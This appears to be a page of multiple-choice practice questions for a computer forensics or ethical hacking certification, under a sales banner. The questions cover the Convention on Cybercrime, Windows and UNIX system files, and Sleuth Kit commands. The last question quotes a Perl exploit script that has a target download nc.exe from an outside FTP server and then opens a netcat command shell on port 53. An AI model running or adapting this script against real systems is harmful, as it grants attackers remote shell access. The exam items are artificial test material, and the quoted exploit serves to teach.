Black Friday Sale Special - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: sntaclus

Convention on Cybercrime, created by the Council of Europe, is the treaty seeking to address

Computer crime and Internet crimes by harmonizing national laws, improving investigative techniques, and increasing cooperation among nations. Which of the following chapters of Convention of Cybercrime contains the provisions for mutual assistances and extradition rules related to cybercrimes?

A.

Chapter II

B.

Chapter IV

C.

Chapter III

D.

Chapter I

Which of the following Windows XP system files handles memory management, I/O operations, and interrupts?

A.

Ntoskrnl.exe

B.

Win32k.sys

C.

Advapi32.dll

D.

Kernel32.dll

Adam works as a professional Computer Hacking Forensic Investigator. A project has been assigned to him to investigate a compromised system of a cyber criminal, who hides some information in his computer. This computer runs on Linux operating system. Adam wants to extract the data units of a file, which is specified by its meta-data address. He is using the Sleuth Kit for this purpose. Which of the following commands in the Sleuth kit will he use to accomplish the task?

A.

dcat

B.

ifind

C.

icat

D.

istat

Which of the following tools is used to modify registry permissions in Windows?

A.

POLEDIT

B.

REGEDIT

C.

REGEDT32

D.

SECEDIT

Which of the following directories contains administrative commands on a UNIX computer?

A.

/usr/local

B.

/sbin

C.

/bin

D.

/export

Which of the following articles defines illegal access to the computer or network in Chapter 2 of Section 1, i.e., Substantive criminal law of the Convention on Cybercrime passed by the Council of Europe?

A.

Article 2

B.

Article 5

C.

Article 16

D.

Article 3

You are responsible for all computer security at your company. This includes initial investigation into alleged unauthorized activity. Which of the following are possible results of improperly gathering forensic evidence in an alleged computer crime by an employee?

Each correct answer represents a complete solution. Choose three.

A.

Your company is sued for defaming the character of an accused party.

B.

You falsely accuse an innocent employee.

C.

Your company is unable to pursue the case against a perpetrator.

D.

You are charged with criminal acts.

John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He copies the whole structure of the We-are-secure Web site to the local disk and obtains all the files on the Web site. Which of the following techniques is he using to accomplish his task?

A.

Web ripping

B.

TCP FTP proxy scanning

C.

Fingerprinting

D.

Eavesdropping

Which of the following statements about the NTDETECT.COM file is true?

Each correct answer represents a complete solution. Choose three.

A.

It is used to gather information about currently installed hardware on the computer.

B.

It is a startup file of the Windows NT/2000 operating system.

C.

It is located in the root of the startup disk.

D.

It is used to dual-boot a computer.

Adam, a malicious hacker performs an exploit, which is given below:

#################################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#################################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl

msadc.pl -h $host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\"");

system("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo

bin>>sasfile\""); system("perl

msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C

\"echo get hacked.

html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print

"Server is downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when

download is finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n";

#system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

A.

Creates an FTP server with write permissions enabled

B.

Opens up a telnet listener that requires no username or password

C.

Opens up a SMTP server that requires no username or password

D.

Creates a share called "sasfile" on the target system